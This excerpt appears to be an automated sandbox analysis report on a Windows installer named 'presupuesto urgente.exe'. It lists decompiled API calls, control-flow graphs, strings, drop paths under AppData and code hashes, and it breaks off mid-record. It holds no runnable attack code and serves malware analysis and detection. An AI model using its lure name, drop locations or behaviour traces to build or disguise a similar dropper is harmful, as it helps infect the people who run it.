                                                                                                                                                      • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\,76893420,"C:\Users\user\Desktop\presupuesto urgente.exe",00000000), ref: 00403B3F
                                                                                                                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BBF
                                                                                                                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BD2
                                                                                                                                                      • GetFileAttributesW.KERNEL32(Call), ref: 00403BDD
                                                                                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet), ref: 00403C26
                                                                                                                                                        • Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304
                                                                                                                                                      • RegisterClassW.USER32(004291E0), ref: 00403C63
                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C7B
                                                                                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CB0
                                                                                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403CE6
                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D12
                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D1F
                                                                                                                                                      • RegisterClassW.USER32(004291E0), ref: 00403D28
                                                                                                                                                      • DialogBoxParamW.USER32(?,00000000,00403E6C,00000000), ref: 00403D47
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                      • String ID: "C:\Users\user\Desktop\presupuesto urgente.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                      • API String ID: 1975747703-90796706
                                                                                                                                                      • Opcode ID: ee5fd85ec343bc094daa65e3c13ef1cff60d12f5a08356af1ceed260609d9923
                                                                                                                                                      • Instruction ID: afe91a4761cf59ebc4b7da6c1f2e4a45d87dcf75ce704844472433b73fc63153
                                                                                                                                                      • Opcode Fuzzy Hash: ee5fd85ec343bc094daa65e3c13ef1cff60d12f5a08356af1ceed260609d9923
                                                                                                                                                      • Instruction Fuzzy Hash: 81619370200601BED720AF669D46E2B3A7CEB84B49F40447FFD45B62E2DB7D9912862D

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 548 4063d2-4063dd 549 4063f0-406406 548->549 550 4063df-4063ee 548->550 551 40640c-406419 549->551 552 40661e-406624 549->552 550->549 551->552 555 40641f-406426 551->555 553 40662a-406635 552->553 554 40642b-406438 552->554 557 406640-406641 553->557 558 406637-40663b call 4063b0 553->558 554->553 556 40643e-40644a 554->556 555->552 559 406450-40648e 556->559 560 40660b 556->560 558->557 562 406494-40649f 559->562 563 4065ae-4065b2 559->563 564 406619-40661c 560->564 565 40660d-406617 560->565 566 4064a1-4064a6 562->566 567 4064b8 562->567 568 4065b4-4065ba 563->568 569 4065e5-4065e9 563->569 564->552 565->552 566->567 572 4064a8-4064ab 566->572 575 4064bf-4064c6 567->575 573 4065ca-4065d6 call 4063b0 568->573 574 4065bc-4065c8 call 4062f7 568->574 570 4065f8-406609 lstrlenW 569->570 571 4065eb-4065f3 call 4063d2 569->571 570->552 571->570 572->567 577 4064ad-4064b0 572->577 586 4065db-4065e1 573->586 574->586 579 4064c8-4064ca 575->579 580 4064cb-4064cd 575->580 577->567 582 4064b2-4064b6 577->582 579->580 584 406508-40650b 580->584 585 4064cf-4064f6 call 40627e 580->585 582->575 587 40651b-40651e 584->587 588 40650d-406519 GetSystemDirectoryW 584->588 599 406596-406599 585->599 600 4064fc-406503 call 4063d2 585->600 586->570 590 4065e3 586->590 592 406520-40652e GetWindowsDirectoryW 587->592 593 406589-40658b 587->593 591 40658d-406591 588->591 595 4065a6-4065ac call 406644 590->595 591->595 596 406593 591->596 592->593 593->591 598 406530-40653a 593->598 595->570 596->599 604 406554-40656a SHGetSpecialFolderLocation 598->604 605 40653c-40653f 598->605 599->595 602 40659b-4065a1 lstrcatW 599->602 600->591 602->595 608 406585 604->608 609 40656c-406583 SHGetPathFromIDListW CoTaskMemFree 604->609 605->604 607 406541-406548 605->607 610 406550-406552 607->610 608->593 609->591 609->608 610->591 610->604
                                                                                                                                                      APIs
                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406513
                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422708,?,0040544B,00422708,00000000), ref: 00406526
                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(0040544B,00000000,00000000,00422708,?,0040544B,00422708,00000000), ref: 00406562
                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406570
                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 0040657B
                                                                                                                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065A1
                                                                                                                                                      • lstrlenW.KERNEL32(Call,00000000,00422708,?,0040544B,00422708,00000000), ref: 004065F9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                      • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                      • API String ID: 717251189-1230650788
                                                                                                                                                      • Opcode ID: 15e8cba43a00d1251787e7505a7f0100c69544ffb4eb695e889bacc90eff1716
                                                                                                                                                      • Instruction ID: 781aa6555cb08bc9a39a1310e2b7c8a7a94b670d8f790df7948cd7d686d0a9f3
                                                                                                                                                      • Opcode Fuzzy Hash: 15e8cba43a00d1251787e7505a7f0100c69544ffb4eb695e889bacc90eff1716
                                                                                                                                                      • Instruction Fuzzy Hash: 52611771600101ABDF209F54ED40ABE37A5AF40314F56453FE947B62D4D73D8AA2CB5D

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 611 40176f-401794 call 402c37 call 405cf8 616 401796-40179c call 4063b0 611->616 617 40179e-4017b0 call 4063b0 call 405c81 lstrcatW 611->617 622 4017b5-4017b6 call 406644 616->622 617->622 626 4017bb-4017bf 622->626 627 4017c1-4017cb call 4066f3 626->627 628 4017f2-4017f5 626->628 636 4017dd-4017ef 627->636 637 4017cd-4017db CompareFileTime 627->637 630 4017f7-4017f8 call 405e7d 628->630 631 4017fd-401819 call 405ea2 628->631 630->631 638 40181b-40181e 631->638 639 40188d-4018b6 call 405414 call 4031ba 631->639 636->628 637->636 640 401820-40185e call 4063b0 * 2 call 4063d2 call 4063b0 call 405a12 638->640 641 40186f-401879 call 405414 638->641 653 4018b8-4018bc 639->653 654 4018be-4018ca SetFileTime 639->654 640->626 673 401864-401865 640->673 651 401882-401888 641->651 655 402ac8 651->655 653->654 657 4018d0-4018db CloseHandle 653->657 654->657 661 402aca-402ace 655->661 658 4018e1-4018e4 657->658 659 402abf-402ac2 657->659 662 4018e6-4018f7 call 4063d2 lstrcatW 658->662 663 4018f9-4018fc call 4063d2 658->663 659->655 669 401901-4022f6 call 405a12 662->669 663->669 669->661 673->651 675 401867-401868 673->675 675->641
                                                                                                                                                      APIs
                                                                                                                                                      • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet,?,?,00000031), ref: 004017B0
                                                                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet,?,?,00000031), ref: 004017D5
                                                                                                                                                        • Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD
                                                                                                                                                        • Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                                                                                                        • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                                                                                                        • Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC,00402EEC,00422708,00000000,00000000,00000000), ref: 0040546F
                                                                                                                                                        • Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp$C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet$Call
                                                                                                                                                      • API String ID: 1941528284-2222187705
                                                                                                                                                      • Opcode ID: c80200c29ca938d3f9be0bc76a293d962ee4304018d07197e4f76f8e1ca0c2de
                                                                                                                                                      • Instruction ID: 6d789f9af123ab0f865e5502c846d56d3cd3544f1fa5f1ae7e054fd30d3333f6
                                                                                                                                                      • Opcode Fuzzy Hash: c80200c29ca938d3f9be0bc76a293d962ee4304018d07197e4f76f8e1ca0c2de
                                                                                                                                                      • Instruction Fuzzy Hash: E741D871510115BACF117BA5CD45EAF3679EF01328B20423FF922F10E1DB3C8A519AAE

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 677 402644-40265d call 402c15 680 402663-40266a 677->680 681 402abf-402ac2 677->681 682 40266c 680->682 683 40266f-402672 680->683 684 402ac8-402ace 681->684 682->683 685 4027d6-4027de 683->685 686 402678-402687 call 406310 683->686 685->681 686->685 690 40268d 686->690 691 402693-402697 690->691 692 40272c-40272f 691->692 693 40269d-4026b8 ReadFile 691->693 694 402731-402734 692->694 695 402747-402757 call 405f25 692->695 693->685 696 4026be-4026c3 693->696 694->695 697 402736-402741 call 405f83 694->697 695->685 706 402759 695->706 696->685 699 4026c9-4026d7 696->699 697->685 697->695 702 402792-40279e call 4062f7 699->702 703 4026dd-4026ef MultiByteToWideChar 699->703 702->684 703->706 707 4026f1-4026f4 703->707 709 40275c-40275f 706->709 710 4026f6-402701 707->710 709->702 711 402761-402766 709->711 710->709 712 402703-402728 SetFilePointer MultiByteToWideChar 710->712 713 4027a3-4027a7 711->713 714 402768-40276d 711->714 712->710 715 40272a 712->715 716 4027c4-4027d0 SetFilePointer 713->716 717 4027a9-4027ad 713->717 714->713 718 40276f-402782 714->718 715->706 716->685 719 4027b5-4027c2 717->719 720 4027af-4027b3 717->720 718->685 721 402784-40278a 718->721 719->685 720->716 720->719 721->691 722 402790 721->722 722->685
                                                                                                                                                      APIs
                                                                                                                                                      • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B0
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                                                                                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                                                                                                                                        • Part of subcall function 00405F83: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405F99
                                                                                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                      • String ID: 9
                                                                                                                                                      • API String ID: 163830602-2366072709
                                                                                                                                                      • Opcode ID: 87cfad3e31df379bf1329a0d53b4cb21fa96f1686d8734dbec1fa7beea93af1a
                                                                                                                                                      • Instruction ID: c360ee4afea2d2749c5a2d2d3cba589ababf6fe072d155cbc4f623872b1d9462
                                                                                                                                                      • Opcode Fuzzy Hash: 87cfad3e31df379bf1329a0d53b4cb21fa96f1686d8734dbec1fa7beea93af1a
                                                                                                                                                      • Instruction Fuzzy Hash: 2E51F874D0021AAADF20DFA5DA88AAEB779FF04304F50443BE511B72D0D7B899828B58

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 723 40671a-40673a GetSystemDirectoryW 724 40673c 723->724 725 40673e-406740 723->725 724->725 726 406751-406753 725->726 727 406742-40674b 725->727 729 406754-406787 wsprintfW LoadLibraryExW 726->729 727->726 728 40674d-40674f 727->728 728->729
                                                                                                                                                      APIs
                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406731
                                                                                                                                                      • wsprintfW.USER32 ref: 0040676C
                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406780
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                      • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                      • API String ID: 2200240437-1946221925
                                                                                                                                                      • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                                                                      • Instruction ID: 212fe184e71725d5a8014c1118872f5233ada1a9ecb6260670121aae60094f83
                                                                                                                                                      • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                                                                      • Instruction Fuzzy Hash: BBF02170510119ABCF10BB64DD0DF9B375CAB00305F50447AA546F20D1EBBCDA78C798

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 730 4058e3-40592e CreateDirectoryW 731 405930-405932 730->731 732 405934-405941 GetLastError 730->732 733 40595b-40595d 731->733 732->733 734 405943-405957 SetFileSecurityW 732->734 734->731 735 405959 GetLastError 734->735 735->733
                                                                                                                                                      APIs
                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405926
                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040593A
                                                                                                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040594F
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00405959
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                      • String ID: C:\Users\user\Desktop
                                                                                                                                                      • API String ID: 3449924974-3370423016
                                                                                                                                                      • Opcode ID: 4e538d1c76d2fdfb7cd0fd00a6572ed9e7029d57e55293966324597acc96cb40
                                                                                                                                                      • Instruction ID: c49c088e9ba2396d105a9c54abfe353073567d613583196498a7e7de041cdc41
                                                                                                                                                      • Opcode Fuzzy Hash: 4e538d1c76d2fdfb7cd0fd00a6572ed9e7029d57e55293966324597acc96cb40
                                                                                                                                                      • Instruction Fuzzy Hash: C8011AB1C10619DADF009FA1C9487EFBFB4EF14354F00403AD545B6291D7789618CFA9

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 736 405ed1-405edd 737 405ede-405f12 GetTickCount GetTempFileNameW 736->737 738 405f21-405f23 737->738 739 405f14-405f16 737->739 741 405f1b-405f1e 738->741 739->737 740 405f18 739->740 740->741
                                                                                                                                                      APIs
                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00405EEF
                                                                                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\presupuesto urgente.exe",00403487,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76893420,004036D5), ref: 00405F0A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CountFileNameTempTick
                                                                                                                                                      • String ID: "C:\Users\user\Desktop\presupuesto urgente.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                      • API String ID: 1716503409-2533845431
                                                                                                                                                      • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                                                                      • Instruction ID: 6418149b7de8853f47a359c443b4445f7a51012143164c36937b703eba88611a
                                                                                                                                                      • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                                                                      • Instruction Fuzzy Hash: 51F03076A00204FBEB009F59ED05E9BB7ACEB95750F10803AED41F7250E6B49A54CB69

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 742 10001759-10001795 call 10001b18 746 100018a6-100018a8 742->746 747 1000179b-1000179f 742->747 748 100017a1-100017a7 call 10002286 747->748 749 100017a8-100017b5 call 100022d0 747->749 748->749 754 100017e5-100017ec 749->754 755 100017b7-100017bc 749->755 756 1000180c-10001810 754->756 757 100017ee-1000180a call 100024a4 call 100015b4 call 10001272 GlobalFree 754->757 758 100017d7-100017da 755->758 759 100017be-100017bf 755->759 763 10001812-1000184c call 100015b4 call 100024a4 756->763 764 1000184e-10001854 call 100024a4 756->764 780 10001855-10001859 757->780 758->754 765 100017dc-100017dd call 10002b57 758->765 761 100017c1-100017c2 759->761 762 100017c7-100017c8 call 1000289c 759->762 769 100017c4-100017c5 761->769 770 100017cf-100017d5 call 10002640 761->770 776 100017cd 762->776 763->780 764->780 773 100017e2 765->773 769->754 769->762 779 100017e4 770->779 773->779 776->773 779->754 785 10001896-1000189d 780->785 786 1000185b-10001869 call 10002467 780->786 785->746 788 1000189f-100018a0 GlobalFree 785->788 792 10001881-10001888 786->792 793 1000186b-1000186e 786->793 788->746 792->785 795 1000188a-10001895 call 1000153d 792->795 793->792 794 10001870-10001878 793->794 794->792 796 1000187a-1000187b FreeLibrary 794->796 795->785 796->792
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001804
